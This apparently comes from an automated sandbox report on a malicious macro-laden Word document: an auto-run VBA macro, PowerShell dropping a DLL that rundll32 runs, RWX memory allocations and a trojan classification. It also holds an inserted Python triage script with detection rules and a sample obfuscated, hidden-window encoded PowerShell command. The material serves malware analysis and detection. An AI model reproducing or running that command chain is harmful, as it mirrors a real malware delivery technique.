Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String createtextfile: Set hiZkEEF = hSbDPCC.CreateTextFile("pygNv:\znIpFIR\yniMs.nmiIGDEDA") Name: Bp63ahh3hb4hyq
Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String createtextfile: Set UPhhYZEF = lEOlGYxK.CreateTextFile("sojcFeJ:\zxDxYHq\rNbtS.PtHuEEP") Name: Bp63ahh3hb4hyq
Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String createtextfile: Set bPFNuJ = VcIiQJFi.CreateTextFile("gNgYGZ:\CatdBMGGg\qGsdAdOQH.cJsxtdJE") Name: Bp63ahh3hb4hyq
Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Y4o_ocvl0jti6oho0r, String createtextfile: Set OBwIBy = QZjuH.CreateTextFile("EEGvGuF:\XrXnHGDDB\noadJZ.yGcKj") Name: Y4o_ocvl0jti6oho0r
Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Y4o_ocvl0jti6oho0r, String createtextfile: Set EUMDPGt = UUoAB.CreateTextFile("XFtOCOULb:\dMKcFHF\GAGPCEp.ZPnnAM") Name: Y4o_ocvl0jti6oho0r
Document contains an embedded VBA with base64 encoded strings
Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String vRrzDEngIQvFPJfE
Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String kWzGMzIVefGB
Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String TthascRlxHZH
Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String utFMeJhUKJhJ
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll
Very long command line found
Source: unknown Process created: Commandline size = 5293
Source: unknown Process created: Commandline size = 5197
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 5197
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Creates files inside the system directory
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Vpdqbmffwwlyu\
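The four signatures above (PowerShell writing a PE file, very long command lines, RWX allocations inside the band where system DLLs are mapped, and files created under the system directory) are the kind of behaviour a triage script can score from endpoint telemetry. The following Python is an added example, not code from this report or from the sandbox vendor: it runs those checks over events constructed in-line to mirror the observations listed here. The 4096-byte command-line threshold, the 0x70000000-0x7FFFFFFF band treated as the system-DLL range, the base64 blob, the rundll32 entry-point argument and the MZ stub are assumptions of the example.

```python
"""Triage checks modelled on the sandbox signatures above.

Added example, not code from the report or from any sandbox vendor. The events
are constructed here (they are not the report's raw logs); the command-line
threshold and the address band treated as "system DLL range" are assumptions.
"""
import re
from dataclasses import dataclass

LONG_CMDLINE = 4096                           # assumed; the report saw 5197 and 5293
SYSTEM_DLL_RANGE = (0x70000000, 0x7FFFFFFF)   # assumed band where 32-bit system DLLs map
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
USER_PROFILE = "c:\\users\\"
CANONICAL_PS = ("powershell", "PowerShell", "POWERSHELL")

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)
# followed by a base64 blob; matching is case-insensitive so "-eNc" is caught too.
ENCODED_FLAG = re.compile(r"(?:^|\s)-e[a-z]*\s+[A-Za-z0-9+/=]{20,}", re.IGNORECASE)
PS_TOKEN = re.compile(r"\bpowershell\b", re.IGNORECASE)


@dataclass
class Event:
    kind: str             # "process", "file" or "alloc"
    image: str            # process that produced the event
    cmdline: str = ""     # process: full command line
    path: str = ""        # file: path created
    data: bytes = b""     # file: first bytes written
    address: int = 0      # alloc: base address
    protect: str = ""     # alloc: page protection


def check_process(ev):
    """Very long / encoded / oddly-cased PowerShell, rundll32 on a user-profile DLL."""
    hits, cl, low = [], ev.cmdline, ev.cmdline.lower()
    if len(cl) >= LONG_CMDLINE:
        hits.append(("long_cmdline", f"{len(cl)} bytes"))
    if ENCODED_FLAG.search(cl):
        hits.append(("encoded_powershell", "-e* switch followed by base64 payload"))
    for tok in PS_TOKEN.findall(cl):
        if tok not in CANONICAL_PS:
            hits.append(("powershell_case_anomaly", tok))
    if "rundll32" in low and ".dll" in low and USER_PROFILE in low:
        hits.append(("rundll32_user_profile_dll", "DLL argument under a user profile"))
    return hits


def check_file(ev):
    """PowerShell writing a PE image; any process creating under the system directories."""
    hits = []
    if "powershell" in ev.image.lower() and ev.data.startswith(b"MZ"):
        hits.append(("powershell_drops_pe", ev.path))
    if ev.path.lower().startswith(SYSTEM_DIRS):
        hits.append(("system_dir_write", ev.path))
    return hits


def check_alloc(ev):
    """Writable+executable allocation inside the band reserved for system DLLs."""
    lo, hi = SYSTEM_DLL_RANGE
    if lo <= ev.address <= hi and "execute" in ev.protect and "write" in ev.protect:
        return [("rwx_in_system_dll_range", f"{ev.address:08X} {ev.protect}")]
    return []


CHECKS = {"process": check_process, "file": check_file, "alloc": check_alloc}


def triage(events):
    """Map rule name -> [(image, detail), ...] for every event that trips a rule."""
    findings = {}
    for ev in events:
        for rule, detail in CHECKS[ev.kind](ev):
            findings.setdefault(rule, []).append((ev.image, detail))
    return findings


# Constructed events shaped like the report's observations. The base64 blob,
# the rundll32 entry-point argument and the MZ stub are placeholders.
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
RUNDLL = r"C:\Windows\SysWOW64\rundll32.exe"
DROPPED_DLL = r"C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll"
SAMPLE_EVENTS = [
    Event("process", PS_EXE, cmdline="pOwErShElL -nOp -w hIdDeN -eNc " + "QUFB" * 1300),
    Event("file", PS_EXE, path=DROPPED_DLL, data=b"MZ\x90\x00\x03\x00\x00\x00"),
    Event("process", RUNDLL, cmdline=f"rundll32.exe {DROPPED_DLL},#1"),
    Event("file", RUNDLL, path="C:\\Windows\\SysWOW64\\Vpdqbmffwwlyu\\"),
    Event("alloc", RUNDLL, address=0x76E20000, protect="page execute and read and write"),
    Event("process", r"C:\Windows\explorer.exe", cmdline=r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for rule, hits in sorted(triage(SAMPLE_EVENTS).items()):
        for image, detail in hits:
            name = image.rsplit("\\", 1)[-1]
            print(f"{rule:26} {name:16} {detail[:50]}")
```

Run stand-alone it prints one line per tripped rule; the benign explorer.exe event trips nothing. Two caveats for anyone adapting it: the checks key on image names, so a renamed PowerShell or rundll32 binary slips past `check_file` and `check_process`, and the fixed address band is a stand-in for comparing each allocation against the modules actually loaded in the process, which is what a real memory-injection check should do.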
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function (78 hits): 7_2_1000976F, 7_2_0026B41F, 7_2_00262C63, 7_2_00273895, 7_2_0026C0C6, 7_2_0026EE78, 7_2_0026568E, 7_2_002702C3, 7_2_002742DA, 7_2_00268736, 7_2_00267B63, 7_2_00274B41, 7_2_0027340A, 7_2_0027687F, 7_2_0026F444, 7_2_0026E05A, 7_2_0027A0AF, 7_2_002648BD, 7_2_002680BA, 7_2_002660B9, 7_2_0027889D, 7_2_002688E5, 7_2_00261CFA, 7_2_002720C5, 7_2_0026F536, 7_2_00270D33, 7_2_0026153C, 7_2_00277D03, 7_2_0026B112, 7_2_00275D1D, 7_2_00278D1C, 7_2_0027511B, 7_2_002669A0, 7_2_00276DB9, 7_2_002761B8, 7_2_00279586, 7_2_0026F98C, 7_2_00266D9F, 7_2_00267998, 7_2_002731E2, 7_2_002771EF, 7_2_00269A37, 7_2_00264A35, 7_2_00262A30, 7_2_00277A0F, 7_2_00275A61, 7_2_0026EA4C, 7_2_002662A3, 7_2_00261280, 7_2_002712E2, 7_2_002726F5, 7_2_002696CD, 7_2_00278ADC, 7_2_0026BB3A, 7_2_00270F0C, 7_2_00272B16, 7_2_00277F1F, 7_2_0026C769, 7_2_00270B68, 7_2_0026E377, 7_2_00271773, 7_2_00268F78, 7_2_00265B79, 7_2_00279B45, 7_2_00272349, 7_2_00278F49, 7_2_00266754, 7_2_0026B75F, 7_2_002617AC, 7_2_002773AC, 7_2_0027878F, 7_2_0026839D, 7_2_00273FE7, 7_2_0026D7EB, 7_2_002767E9, 7_2_002763C1, 7_2_00271BDF, 7_2_00269FDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function (77 hits): 8_2_0024B41F, 8_2_00242C63, 8_2_0024EE78, 8_2_0024568E, 8_2_00253895, 8_2_0024C0C6, 8_2_002502C3, 8_2_002542DA, 8_2_00248736, 8_2_00247B63, 8_2_00254B41, 8_2_002563C1, 8_2_00244A35, 8_2_00249A37, 8_2_00242A30, 8_2_00257A0F, 8_2_0025340A, 8_2_00255A61, 8_2_0025687F, 8_2_0024F444, 8_2_0024EA4C, 8_2_0024E05A, 8_2_002462A3, 8_2_0025A0AF, 8_2_002448BD, 8_2_002460B9, 8_2_002480BA, 8_2_00241280, 8_2_0025889D, 8_2_002488E5, 8_2_002512E2, 8_2_002526F5, 8_2_00241CFA, 8_2_002520C5, 8_2_002496CD, 8_2_00258ADC, 8_2_0024F536, 8_2_00250D33, 8_2_0024153C, 8_2_0024BB3A, 8_2_00257D03, 8_2_00250F0C, 8_2_00252B16, 8_2_0024B112, 8_2_00255D1D, 8_2_00258D1C, 8_2_00257F1F, 8_2_0025511B, 8_2_0024C769, 8_2_00250B68, 8_2_0024E377, 8_2_00251773, 8_2_00248F78, 8_2_00245B79, 8_2_00259B45, 8_2_00252349, 8_2_00258F49, 8_2_00246754, 8_2_0024B75F, 8_2_002469A0, 8_2_002417AC, 8_2_002573AC, 8_2_00256DB9, 8_2_002561B8, 8_2_00259586, 8_2_0024F98C, 8_2_0025878F, 8_2_0024839D, 8_2_00246D9F, 8_2_00247998, 8_2_00253FE7, 8_2_002531E2, 8_2_002571EF, 8_2_002567E9, 8_2_0024D7EB, 8_2_00249FDC, 8_2_00251BDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function (77 hits): 9_2_003AB41F, 9_2_003AEE78, 9_2_003A2C63, 9_2_003B3895, 9_2_003A568E, 9_2_003B42DA, 9_2_003B02C3, 9_2_003AC0C6, 9_2_003A8736, 9_2_003A7B63, 9_2_003B4B41, 9_2_003B63C1, 9_2_003A2A30, 9_2_003A9A37, 9_2_003A4A35, 9_2_003B340A, 9_2_003B7A0F, 9_2_003B687F, 9_2_003B5A61, 9_2_003AE05A, 9_2_003AEA4C, 9_2_003AF444, 9_2_003A80BA, 9_2_003A60B9, 9_2_003A48BD, 9_2_003BA0AF, 9_2_003A62A3, 9_2_003B889D, 9_2_003A1280, 9_2_003A1CFA, 9_2_003B26F5, 9_2_003B12E2, 9_2_003A88E5, 9_2_003B8ADC, 9_2_003A96CD, 9_2_003B20C5, 9_2_003ABB3A, 9_2_003A153C, 9_2_003B0D33, 9_2_003AF536, 9_2_003B511B, 9_2_003B7F1F, 9_2_003B5D1D, 9_2_003B8D1C, 9_2_003AB112, 9_2_003B2B16, 9_2_003B0F0C, 9_2_003B7D03, 9_2_003A8F78, 9_2_003A5B79, 9_2_003B1773, 9_2_003AE377, 9_2_003AC769, 9_2_003B0B68, 9_2_003AB75F, 9_2_003A6754, 9_2_003B2349, 9_2_003B8F49, 9_2_003B9B45, 9_2_003B6DB9, 9_2_003B61B8, 9_2_003A17AC, 9_2_003B73AC, 9_2_003A69A0, 9_2_003A7998, 9_2_003A6D9F, 9_2_003A839D, 9_2_003B878F, 9_2_003AF98C, 9_2_003B9586, 9_2_003AD7EB, 9_2_003B67E9, 9_2_003B71EF, 9_2_003B31E2, 9_2_003B3FE7, 9_2_003B1BDF, 9_2_003A9FDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function (77 hits): 10_2_0021B41F, 10_2_00212C63, 10_2_0021EE78, 10_2_0021568E, 10_2_00223895, 10_2_002202C3, 10_2_0021C0C6, 10_2_002242DA, 10_2_00218736, 10_2_00217B63, 10_2_00224B41, 10_2_002263C1, 10_2_00212A30, 10_2_00214A35, 10_2_00219A37, 10_2_0022340A, 10_2_00227A0F, 10_2_00225A61, 10_2_0022687F, 10_2_0021F444, 10_2_0021EA4C, 10_2_0021E05A, 10_2_002162A3, 10_2_0022A0AF, 10_2_002160B9, 10_2_002180BA, 10_2_002148BD, 10_2_00211280, 10_2_0022889D, 10_2_002212E2, 10_2_002188E5, 10_2_002226F5, 10_2_00211CFA, 10_2_002220C5, 10_2_002196CD, 10_2_00228ADC, 10_2_00220D33, 10_2_0021F536, 10_2_0021BB3A, 10_2_0021153C, 10_2_00227D03, 10_2_00220F0C, 10_2_0021B112, 10_2_00222B16, 10_2_0022511B, 10_2_00227F1F, 10_2_00228D1C, 10_2_00225D1D, 10_2_0021C769, 10_2_00220B68, 10_2_00221773, 10_2_0021E377, 10_2_00215B79, 10_2_00218F78, 10_2_00229B45, 10_2_00222349, 10_2_00228F49, 10_2_00216754, 10_2_0021B75F, 10_2_002169A0, 10_2_002117AC, 10_2_002273AC, 10_2_002261B8, 10_2_00226DB9, 10_2_00229586, 10_2_0022878F, 10_2_0021F98C, 10_2_00217998, 10_2_0021839D, 10_2_00216D9F, 10_2_002231E2, 10_2_00223FE7, 10_2_0021D7EB, 10_2_002267E9, 10_2_002271EF, 10_2_00221BDF, 10_2_00219FDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function (77 hits): 11_2_00402C63, 11_2_0040EE78, 11_2_0040B41F, 11_2_004102C3, 11_2_0040C0C6, 11_2_004142DA, 11_2_0040568E, 11_2_00413895, 11_2_00414B41, 11_2_00407B63, 11_2_00408736, 11_2_004163C1, 11_2_0040F444, 11_2_0040EA4C, 11_2_0040E05A, 11_2_00415A61, 11_2_0041687F, 11_2_0041340A, 11_2_00417A0F, 11_2_00402A30, 11_2_00404A35, 11_2_00409A37, 11_2_004120C5, 11_2_004096CD, 11_2_00418ADC, 11_2_004112E2, 11_2_004088E5, 11_2_004126F5, 11_2_00401CFA, 11_2_00401280, 11_2_0041889D, 11_2_004062A3, 11_2_0041A0AF, 11_2_004060B9, 11_2_004080BA, 11_2_004048BD, 11_2_00419B45, 11_2_00412349, 11_2_00418F49, 11_2_00406754, 11_2_0040B75F, 11_2_0040C769, 11_2_00410B68, 11_2_00411773, 11_2_0040E377, 11_2_00408F78, 11_2_00405B79, 11_2_00417D03, 11_2_00410F0C, 11_2_0040B112, 11_2_00412B16, 11_2_0041511B, 11_2_00415D1D, 11_2_00418D1C, 11_2_00417F1F, 11_2_00410D33, 11_2_0040F536, 11_2_0040BB3A, 11_2_0040153C, 11_2_00409FDC, 11_2_00411BDF, 11_2_004131E2, 11_2_00413FE7, 11_2_004167E9, 11_2_0040D7EB, 11_2_004171EF, 11_2_00419586, 11_2_0040F98C, 11_2_0041878F, 11_2_00407998, 11_2_0040839D, 11_2_00406D9F, 11_2_004069A0, 11_2_004017AC, 11_2_004173AC, 11_2_00416DB9, 11_2_004161B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002AB41F, 12_2_002A2C63, 12_2_002AEE78, 12_2_002A568E, 12_2_002B3895
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B02C3 12_2_002B02C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002AC0C6 12_2_002AC0C6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B42DA 12_2_002B42DA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A8736 12_2_002A8736
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A7B63 12_2_002A7B63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B4B41 12_2_002B4B41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B63C1 12_2_002B63C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A2A30 12_2_002A2A30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A9A37 12_2_002A9A37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A4A35 12_2_002A4A35
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B340A 12_2_002B340A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B7A0F 12_2_002B7A0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B5A61 12_2_002B5A61
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B687F 12_2_002B687F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002AEA4C 12_2_002AEA4C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002AF444 12_2_002AF444
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002AE05A 12_2_002AE05A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002BA0AF 12_2_002BA0AF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A62A3 12_2_002A62A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A80BA 12_2_002A80BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A60B9 12_2_002A60B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A48BD 12_2_002A48BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A1280 12_2_002A1280
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B889D 12_2_002B889D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B12E2 12_2_002B12E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A88E5 12_2_002A88E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A1CFA 12_2_002A1CFA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B26F5 12_2_002B26F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A96CD 12_2_002A96CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B20C5 12_2_002B20C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B8ADC 12_2_002B8ADC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002ABB3A 12_2_002ABB3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A153C 12_2_002A153C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B0D33 12_2_002B0D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002AF536 12_2_002AF536
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B0F0C 12_2_002B0F0C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B7D03 12_2_002B7D03
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B511B 12_2_002B511B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B7F1F 12_2_002B7F1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B5D1D 12_2_002B5D1D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B8D1C 12_2_002B8D1C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002AB112 12_2_002AB112
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B2B16 12_2_002B2B16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002AC769 12_2_002AC769
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B0B68 12_2_002B0B68
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A8F78 12_2_002A8F78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A5B79 12_2_002A5B79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B1773 12_2_002B1773
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002AE377 12_2_002AE377
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B2349 12_2_002B2349
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B8F49 12_2_002B8F49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B9B45 12_2_002B9B45
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002AB75F 12_2_002AB75F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A6754 12_2_002A6754
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A17AC 12_2_002A17AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B73AC 12_2_002B73AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A69A0 12_2_002A69A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B6DB9 12_2_002B6DB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B61B8 12_2_002B61B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B878F 12_2_002B878F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002AF98C 12_2_002AF98C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B9586 12_2_002B9586
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A7998 12_2_002A7998
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A6D9F 12_2_002A6D9F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A839D 12_2_002A839D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002AD7EB 12_2_002AD7EB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B67E9 12_2_002B67E9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B71EF 12_2_002B71EF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B31E2 12_2_002B31E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B3FE7 12_2_002B3FE7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002B1BDF 12_2_002B1BDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002A9FDC 12_2_002A9FDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002AB41F 13_2_002AB41F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002A2C63 13_2_002A2C63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002AEE78 13_2_002AEE78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002A568E 13_2_002A568E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002B3895 13_2_002B3895
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002B02C3 13_2_002B02C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002AC0C6 13_2_002AC0C6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002B42DA 13_2_002B42DA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002A8736 13_2_002A8736
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002A7B63 13_2_002A7B63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002B4B41 13_2_002B4B41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002B63C1 13_2_002B63C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002A2A30 13_2_002A2A30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002A9A37 13_2_002A9A37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002A4A35 13_2_002A4A35
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002B340A 13_2_002B340A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002B7A0F 13_2_002B7A0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002B5A61 13_2_002B5A61
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002B687F 13_2_002B687F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002AEA4C 13_2_002AEA4C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002AF444 13_2_002AF444
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002AE05A 13_2_002AE05A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002BA0AF 13_2_002BA0AF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002A62A3 13_2_002A62A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002A80BA 13_2_002A80BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002A60B9 13_2_002A60B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002A48BD 13_2_002A48BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002A1280 13_2_002A1280
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002B889D 13_2_002B889D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002B12E2 13_2_002B12E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002A88E5 13_2_002A88E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002A1CFA 13_2_002A1CFA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002B26F5 13_2_002B26F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002A96CD 13_2_002A96CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002B20C5 13_2_002B20C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002B8ADC 13_2_002B8ADC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002ABB3A 13_2_002ABB3A
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: bestand-8881014518 00944.doc OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation OLE, VBA macro: Module Wm_t404p8v_, Function Document_open Name: Document_open
Document contains embedded VBA macros
Source: bestand-8881014518 00944.doc OLE indicator, VBA macros: true
Yara signature match
Source: 00000005.00000002.2092921880.0000000000366000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.2092945570.0000000001B86000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: O_5Z.dll.5.dr Static PE information: Section: .rsrc ZLIB complexity 0.994955920298
Source: rundll32.exe, 00000006.00000002.2101148433.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095917337.0000000000910000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.expl.evad.winDOC@34/8@1/1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10002D70 SysAllocString,CoCreateInstance,PropVariantClear,SysFreeString,SysFreeString, 7_2_10002D70
